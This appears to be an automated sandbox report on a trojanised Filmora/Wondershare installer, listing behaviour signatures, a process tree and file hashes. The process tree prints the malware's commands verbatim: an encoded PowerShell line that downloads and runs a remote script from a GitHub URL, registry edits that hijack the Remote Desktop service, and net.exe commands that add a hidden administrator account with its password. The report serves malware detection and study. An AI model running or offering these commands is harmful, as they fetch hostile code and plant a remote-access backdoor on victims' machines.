Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-07-2021 07:50
General
-
Target
Filmora-Wondershare-Installer.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC7.tmp" "c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\CSCE599C57EBA6F41B09372974D9DECE673.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc leaP4oKy /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc leaP4oKy /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc leaP4oKy /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc leaP4oKy1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc leaP4oKy2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc leaP4oKy3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESCC7.tmpMD5
b3ed24cfd539c757ba78cc9d5a179adf
SHA10560de4cc03ed282cdce5d7ba2238f831069415c
SHA256637fb9901f4eb7e86f5bab67dc4f7a122ed53d335e7bcfd2f9150c5f3f982dfc
SHA5124a705be11f7a55f47dda7c709cf8bf400de85c9f091371c643199c53301b2f1087e79e065ab645e15b476964632f3ca9cf96a0d2e8f61329cac1992827f9ebcf
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA5129e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.dllMD5
78316c923481b1f1c3dbebf3b3bac369
SHA145f6ca94d5d00b2f54ee2f82ba728397ca664aaa
SHA2562f683842fbb64a1e0c816525c01fa5fcad453b3b3e34b6acc0aba6f4c59b3068
SHA5127415c49ddf3f38dc8d7c166c649c0ad7609794d87b156871d57338398566f9d1ad91e653057895edfe53345bf7293b3ad2d693dd1084ac09abad45d855f4a173
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.configMD5
ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA2569c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA51285766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\CSCE599C57EBA6F41B09372974D9DECE673.TMPMD5
7674fb62b97c681ba739627ccfa831f1
SHA1c7c9a294859087205b4a4234cef9cf2ffd1d0688
SHA256a3d37ae906cc1ad031b142902fa4af7783bc6b16c34f7fb932cfd1effe426446
SHA512840543ce21f25ea320b7e60947868c83d34a45bef5995c9cfee8d26b179f11b5987d35dcd1e2df84e0b52fcccc17597c77578e83b4970fcb175860dea1b592fb
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.cmdlineMD5
c5b8b4d6484df600c9ad1efb4e8cb2dd
SHA171e459785921e7130dbe889aceb0c645ec8d6f4b
SHA25653feec5f42db1f6d56f7a5c2a4e92b3e94be377cb72fccc429546a057b38b544
SHA5127ed4359aeb5038849cea88d534918523a52d7ae62b886efe2f87ff8c432f0bef7881a472ada49ef23b55d19dd7d80679f0984ded8e08ba8f83f4fe4c117d0d35
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.pngMD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
memory/1028-318-0x0000000000000000-mapping.dmp
-
memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmpFilesize
4KB
-
memory/1868-116-0x0000000001990000-0x0000000001992000-memory.dmpFilesize
8KB
-
memory/2152-125-0x0000000000000000-mapping.dmp
-
memory/2760-362-0x0000000000000000-mapping.dmp
-
memory/2784-160-0x0000024CB8C80000-0x0000024CB8C81000-memory.dmpFilesize
4KB
-
memory/2784-153-0x0000024CB8BD3000-0x0000024CB8BD5000-memory.dmpFilesize
8KB
-
memory/2784-152-0x0000024CB8BD0000-0x0000024CB8BD2000-memory.dmpFilesize
8KB
-
memory/2784-154-0x0000024CB8BD6000-0x0000024CB8BD8000-memory.dmpFilesize
8KB
-
memory/2784-141-0x0000024CB8C30000-0x0000024CB8C31000-memory.dmpFilesize
4KB
-
memory/2784-170-0x0000024CD15D0000-0x0000024CD15D1000-memory.dmpFilesize
4KB
-
memory/2784-144-0x0000024CD0F50000-0x0000024CD0F51000-memory.dmpFilesize
4KB
-
memory/2784-171-0x0000024CD1960000-0x0000024CD1961000-memory.dmpFilesize
4KB
-
memory/2784-180-0x0000024CB8BD8000-0x0000024CB8BD9000-memory.dmpFilesize
4KB
-
memory/2784-136-0x0000000000000000-mapping.dmp
-
memory/3016-123-0x0000000005C50000-0x0000000005C51000-memory.dmpFilesize
4KB
-
memory/3016-122-0x0000000005C10000-0x0000000005C41000-memory.dmpFilesize
196KB
-
memory/3016-120-0x0000000000D30000-0x0000000000D31000-memory.dmpFilesize
4KB
-
memory/3016-117-0x0000000000000000-mapping.dmp
-
memory/3176-371-0x0000000000000000-mapping.dmp
-
memory/3708-374-0x0000000000000000-mapping.dmp
-
memory/3988-129-0x00000234C4ED0000-0x00000234C517A000-memory.dmpFilesize
2.7MB
-
memory/3988-134-0x00000234C4C16000-0x00000234C4C17000-memory.dmpFilesize
4KB
-
memory/3988-133-0x00000234C4C15000-0x00000234C4C16000-memory.dmpFilesize
4KB
-
memory/3988-124-0x0000000000000000-mapping.dmp
-
memory/3988-131-0x00000234C4C10000-0x00000234C4C12000-memory.dmpFilesize
8KB
-
memory/3988-132-0x00000234C4C13000-0x00000234C4C15000-memory.dmpFilesize
8KB
-
memory/4112-375-0x0000000000000000-mapping.dmp
-
memory/4116-150-0x0000000000000000-mapping.dmp
-
memory/4152-376-0x0000000000000000-mapping.dmp
-
memory/4156-156-0x0000000000000000-mapping.dmp
-
memory/4164-372-0x0000000000000000-mapping.dmp
-
memory/4196-373-0x0000000000000000-mapping.dmp
-
memory/4200-179-0x00000000011A0000-0x00000000011A2000-memory.dmpFilesize
8KB
-
memory/4200-162-0x0000000000000000-mapping.dmp
-
memory/4224-317-0x0000000000000000-mapping.dmp
-
memory/4240-316-0x0000000000000000-mapping.dmp
-
memory/4268-377-0x0000000000000000-mapping.dmp
-
memory/4268-465-0x0000000000000000-mapping.dmp
-
memory/4288-379-0x0000000000000000-mapping.dmp
-
memory/4312-380-0x0000000000000000-mapping.dmp
-
memory/4316-228-0x000001C64F408000-0x000001C64F40A000-memory.dmpFilesize
8KB
-
memory/4316-178-0x0000000000000000-mapping.dmp
-
memory/4316-189-0x000001C64F400000-0x000001C64F402000-memory.dmpFilesize
8KB
-
memory/4316-190-0x000001C64F403000-0x000001C64F405000-memory.dmpFilesize
8KB
-
memory/4316-200-0x000001C64F406000-0x000001C64F408000-memory.dmpFilesize
8KB
-
memory/4324-464-0x0000000000000000-mapping.dmp
-
memory/4332-378-0x0000000000000000-mapping.dmp
-
memory/4340-356-0x0000000000000000-mapping.dmp
-
memory/4380-384-0x0000000000000000-mapping.dmp
-
memory/4380-450-0x000001C4FCC68000-0x000001C4FCC69000-memory.dmpFilesize
4KB
-
memory/4380-397-0x000001C4FCC60000-0x000001C4FCC62000-memory.dmpFilesize
8KB
-
memory/4380-398-0x000001C4FCC63000-0x000001C4FCC65000-memory.dmpFilesize
8KB
-
memory/4380-399-0x000001C4FCC66000-0x000001C4FCC68000-memory.dmpFilesize
8KB
-
memory/4392-383-0x0000000000000000-mapping.dmp
-
memory/4572-381-0x0000000000000000-mapping.dmp
-
memory/4656-382-0x0000000000000000-mapping.dmp
-
memory/4728-355-0x0000000000000000-mapping.dmp
-
memory/4752-229-0x00000164ACFE0000-0x00000164ACFE2000-memory.dmpFilesize
8KB
-
memory/4752-222-0x0000000000000000-mapping.dmp
-
memory/4752-230-0x00000164ACFE3000-0x00000164ACFE5000-memory.dmpFilesize
8KB
-
memory/4752-265-0x00000164ACFE6000-0x00000164ACFE8000-memory.dmpFilesize
8KB
-
memory/4768-359-0x0000000000000000-mapping.dmp
-
memory/4812-360-0x0000000000000000-mapping.dmp
-
memory/4856-361-0x0000000000000000-mapping.dmp
-
memory/4904-363-0x0000000000000000-mapping.dmp
-
memory/4920-364-0x0000000000000000-mapping.dmp
-
memory/4936-365-0x0000000000000000-mapping.dmp
-
memory/4956-366-0x0000000000000000-mapping.dmp
-
memory/5000-369-0x0000000000000000-mapping.dmp
-
memory/5012-370-0x0000000000000000-mapping.dmp
-
memory/5016-260-0x0000000000000000-mapping.dmp
-
memory/5016-300-0x00000264FE756000-0x00000264FE758000-memory.dmpFilesize
8KB
-
memory/5016-298-0x00000264FE750000-0x00000264FE752000-memory.dmpFilesize
8KB
-
memory/5016-299-0x00000264FE753000-0x00000264FE755000-memory.dmpFilesize
8KB
